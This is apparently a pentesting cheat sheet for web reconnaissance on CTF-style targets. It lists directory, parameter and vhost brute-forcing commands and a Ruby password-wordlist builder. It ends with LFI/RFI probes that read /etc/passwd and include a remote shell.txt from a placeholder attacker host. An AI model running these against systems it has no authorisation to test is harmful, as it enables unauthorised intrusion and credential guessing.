

Directory enumeration

Hints:

  • Add --insecuressl when dealing with HTTPS.
  • Don't forget to search for exploits for standard CGI files!
  • Use DirBuster (GUI) as well. Why not…
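
For the CGI hint, searchsploit can query the local Exploit-DB mirror for known issues in standard CGI scripts; the search terms below are only examples:

```shell
# Look up known exploits for common CGI scripts in the local Exploit-DB copy
searchsploit cgi-bin
# Shellshock is a classic candidate when /cgi-bin/ scripts are exposed
searchsploit shellshock
```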

General search

nikto -host $victim
gobuster dir -u http://$target/ -a 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 60
gobuster dir -u http://$target/ -a 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 60

gobuster dir -u http://$target/ -p socks5://127.0.0.1:9991 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 60
HTTP_PROXY="socks4://127.0.0.1:9990/" gobuster dir -u http://$target/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 60

If you get the error "Error: error on parsing arguments: status-codes ("200") and status-codes-blacklist ("404") are both set - please set only one. status-codes-blacklist is set by default so you might want to disable it by supplying an empty string.", use the -b flag:

gobuster dir -u http://$target/ -a 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -b 301

Alternative with dirsearch:

python3 /opt/dirsearch/dirsearch.py -u http://$target/ --random-agent -e php,html,sql -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r [--header "Authorization: Basic b2Zmc2VjOmVsaXRl"]

Searching for file suffixes

proxychains4 -q dirb http://$target/index /opt/wfuzz/wordlist/general/extensions_common.txt -t
gobuster dir -u http://$target -t 40 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x .php,.html,.bak,.txt,.sql,.zip,.xml,.db,.sh

Search for cgi-bin related things

gobuster dir -u http://$target/ -a 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -w /usr/share/seclists/Discovery/Web-Content/CGIs.txt -s '200,204,301,302,307,403,500' -e
gobuster dir -u http://$target/ -a 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -w /usr/share/seclists/Discovery/Web-Content/CGIs.txt -s '200' -e

Search within parameters

  • Assume there is a URL like /index?file=bla.php
  • Then use gobuster with the length option (-l) and note the size of the error document:
    gobuster dir -u http://$target/blog/?lang= -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 60 -l --wildcard
  • Perform the search and remove all lines which have that exact size:
    gobuster dir -u http://$target/blog/?lang= -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 60 -l --wildcard -x .php,.inc,.htm,.html | grep -v 2720

Search for endpoints / URLs

Use hakrawler to crawl the site and return a list of unique endpoints from it.

echo "http://$target" | hakrawler -u

Creating wordlists from documents / HTML pages

With curl

curl http://$target/website | grep -oE '\w+' | sort -u -f | more

With Ruby

Use this Ruby script and add your HTML output / text to extract significant words you could try as a password or in a gobuster wordlist.

require 'set'

# Sample stopwords list (add more based on the language you're working with)
STOPWORDS = Set.new(%w[the and is in of to for a on that by as with it at from this be an or are])

# Function to extract potential passwords from the text
def extract_significant_words(text)
  # Split the text into words, remove punctuation, and filter out stopwords and short words
  words = text.scan(/\b\w+\b/)
             .map(&:downcase)  # Normalize to lowercase
             .reject { |word| word.length <= 4 || STOPWORDS.include?(word) }
  
  # Count word frequencies
  frequency = Hash.new(0)
  words.each { |word| frequency[word] += 1 }

  # Filter out overly common words (words that occur too many times).
  # Integer division can yield 0 on short inputs, so enforce a minimum of 1.
  threshold = [words.size / 50, 1].max  # Adjust this threshold as necessary
  significant_words = frequency.select { |_word, count| count <= threshold }

  # Return the unique significant words
  significant_words.keys
end

# Example usage
text = <<-TEXT
Gaara is a character in the Naruto anime. He is a ninja from Sunagakure and became the Kazekage. Gaara fights using sand, controlled by his connection to Shukaku, the tailed beast.
TEXT

# Extract and print significant words
password_candidates = extract_significant_words(text)
puts password_candidates

Fuzzing parameters

With Wfuzz:

wfuzz -z range,0-10 --hl 97 http://$target/sator.php?p1=FUZZ

Excluding content: this makes requests from 0-100 for the POST parameter id_no and hides all responses whose body matches the regexp, here just a 3:

wfuzz -z range,0-100 -d "id_no=FUZZ" --hs 3 "http://faculty.htb/admin/ajax.php?action=login_faculty"

Interesting files

Vhost enumeration

ffuf -u http://linkvortex.htb/ -w subdomains.txt -H "Host: FUZZ.linkvortex.htb" -mc 200

Alter­na­tive:

gobuster vhost -u http://$VICTIM_DOMAIN/ --append-domain -w /usr/share/wordlists/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -t 60

Alternative:

dnsrecon -d domain.com -D vhost_names.txt -t brt
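
A brute-forced vhost only resolves once it is mapped to the target IP, e.g. in /etc/hosts. A sketch with a hypothetical hostname dev.domain.com:

```shell
# Append a discovered vhost (hypothetical name dev.domain.com) to /etc/hosts
echo "$target dev.domain.com" | sudo tee -a /etc/hosts
```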

Other techniques

  • Use local file inclusion (LFI)
    • Try to change a filename parameter to read/parse a local file.
  • Use remote file inclusion (RFI)
    • Try to prepend a protocol like http:// to include a file from another server you control.
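
Both can be probed directly with curl. A sketch, assuming the /index?file= parameter from above and a placeholder $attacker_ip for your own machine:

```shell
# LFI: swap a hypothetical "file" parameter for a path traversal payload
curl -s "http://$target/index?file=../../../../etc/passwd"
# RFI: point the same parameter at a file hosted on your own server
# ($attacker_ip is a placeholder for your machine)
curl -s "http://$target/index?file=http://$attacker_ip/shell.txt"
```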
